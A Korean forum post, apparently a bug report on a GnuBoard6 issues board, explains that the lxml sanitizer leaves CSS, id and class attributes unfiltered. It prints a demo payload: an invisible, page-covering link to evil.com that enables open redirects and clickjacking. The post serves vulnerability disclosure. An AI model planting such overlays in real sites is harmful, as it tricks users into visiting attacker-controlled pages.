m

CSS, ID, CLASS misconfigure로 인한 취약점

· 2025-05-13 (화) 00:33:16 · 581
lxml은 css 및 id, class 부분을 필터링 하지 않기 때문에 이를 조합하면 Open redirect, 광고 사이트 popup 등의 취약점이 발생될 수 있습니다.

영상에서 사용한 페이로드 입니다.

`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`

https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f
|
댓글을 작성하시려면 로그인이 필요합니다.

그누보드6 이슈

174건

좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.

+
제목 글쓴이 날짜 조회
25-07-13 조회 662
25-07-07 조회 572
25-07-07 조회 673
mmingijunggra...
25-05-13 조회 582
mmingijunggra...
25-05-13 조회 541
25-01-15 조회 609
sseiblog-nand...
24-07-10 조회 842
24-07-08 조회 954
sseiblog-nand...
24-07-04 조회 802
sseiblog-nand...
24-07-03 조회 735
sseiblog-nand...
24-07-02 조회 803
sseiblog-nand...
24-07-02 조회 693
sseiblog-nand...
24-07-02 조회 719
sseiblog-nand...
24-07-02 조회 649
sseiblog-nand...
24-07-02 조회 686
sseiblog-nand...
24-07-02 조회 751
sseiblog-nand...
24-07-01 조회 759
sseiblog-nand...
24-07-01 조회 705
sseiblog-nand...
24-06-28 조회 745
sseiblog-nand...
24-06-28 조회 703